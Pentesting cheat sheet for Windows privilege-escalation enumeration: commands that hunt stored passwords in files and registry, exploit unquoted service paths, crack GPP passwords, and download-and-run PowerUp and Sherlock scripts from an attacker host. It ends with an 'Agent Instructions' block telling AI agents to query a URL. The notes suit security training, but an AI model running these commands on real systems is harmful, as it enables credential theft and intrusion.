# Windows enumeration **#Basics** ``` #systeminfo hostname # Who am I? whoami echo %username% # What users/localgroups are on the machine? net users net localgroups # More info about a specific user. Check if user has privileges. net user user1 # View Domain Groups net group /domain # View Members of Domain Group net group /domain # Firewall netsh firewall show state netsh firewall show config # Network ipconfig /all route print arp -A # How well patched is the system? wmic qfe get Caption,Description,HotFixID,InstalledOn ``` **#Cleartext passwords** ``` findstr /si password *.txt findstr /si password *.xml findstr /si password *.ini #Find all those strings in config files. dir /s *pass* == *cred* == *vnc* == *.config* # Find all passwords in all files. findstr /spin "password" *.* findstr /spin "password" *.* ``` **#Passwords in files** ``` c:\sysprep.inf c:\sysprep\sysprep.xml c:\unattend.xml %WINDIR%\Panther\Unattend\Unattended.xml %WINDIR%\Panther\Unattended.xml dir c:\*vnc.ini /s /b dir c:\*ultravnc.ini /s /b dir c:\ /s /b | findstr /si *vnc.ini ``` **#Passwords in registry** ``` # VNC reg query "HKCU\Software\ORL\WinVNC3\Password" # Windows autologin reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # SNMP Paramters reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # Putty reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Search for password in registry reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s ``` **#Checking for Kernel exploits** ``` systeminfo # or wmic qfe get Caption,Description,HotFixID,InstalledOn ``` **#Scheduled tasks** ``` schtasks /query /fo LIST /v ``` **#Weak service permissions** ``` #will spit out a ton of output wmic service list brief #To prune the output into something more manageable,leverage wimc and icalcs from C:\Windows\temp | try: for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt Then: for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a" ``` **#sc.exe** ``` sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt FOR /F %i in (Servicenames.txt) DO echo %i type Servicenames.txt FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt ``` **#Unquoted service paths:**If the path contains a space and is not quoted,the service is vulnerable. ``` # Using WMIC wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ # Using sc sc query sc qc service name # Look for Binary_path_name and see if it is unquoted. #Example of an unquoted executable: c:\Program Files\something\winamp.exe #We can place a payload like this: c:\evil.exe #There is also a metasploit module: exploit/windows/local/trusted_service_path ``` **#Check for vulnerable drivers** ``` # List all drivers driverquery ``` **#Group policy preferences** ``` # Output environment-variables set # Look for the following: LOGONSERVER=\\NAMEOFSERVER USERDNSDOMAIN=EXAMPLE.LOCAL # Look up ip-addres nslookup nameofserver.example.local # It will output something like this Address: 192.168.1.101 # Now you can mount it net use z: \\192.168.1.101\SYSVOL # Enter z: # Now search for the groups.xml file dir Groups.xml /s #If an encrypted password is found , exfile to kali and crack: gpp-decrypt encryptedpassword ``` **#Pint test blind RCE** > ``` > C:\Windows\System32\cmd.exe /c ping 10.10.10.10 > # on linux box: > tcpdump -i tun0 icmp > ``` **#Same if powershell is available** ``` C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe ping 10.10.10.10 ``` **#Firewall / AV / Defender** ``` netsh firewall show state netsh firewall show config Sc query windefend Netsh advfirewall firewall dump, netsh firewall show state ``` **#Automated tools checklist** ``` #Run winpeas Run PowerUp.ps1 powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/PowerUp.ps1');Invoke-AllChecks" #Run Sherlock.ps1 powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Sherlock.ps1');Find-AllVulns" #Run JAWS # Executables WinPEAS.exe /.bat * Seatbelt.exe Watson.exe * Sharpup.exe windows-privesc-check2.exe --dump -G #Powershell Sherlock.ps1 * PowerUp.ps1 * jaws-enumps1 * #Other Windows-exploit-suggester.py * Systeminfo -> a text file and run it with windows exploit suggester.py, search for exploit in SecWiki github MSF exploit suggester * In a meterpreter session – run /post/multi/recon/local_exploit_suggester - > shows list of kernel ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://davidtancredi.gitbook.io/pentesting-notes/r3dcl1ff/privesc/windows-enumeration.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.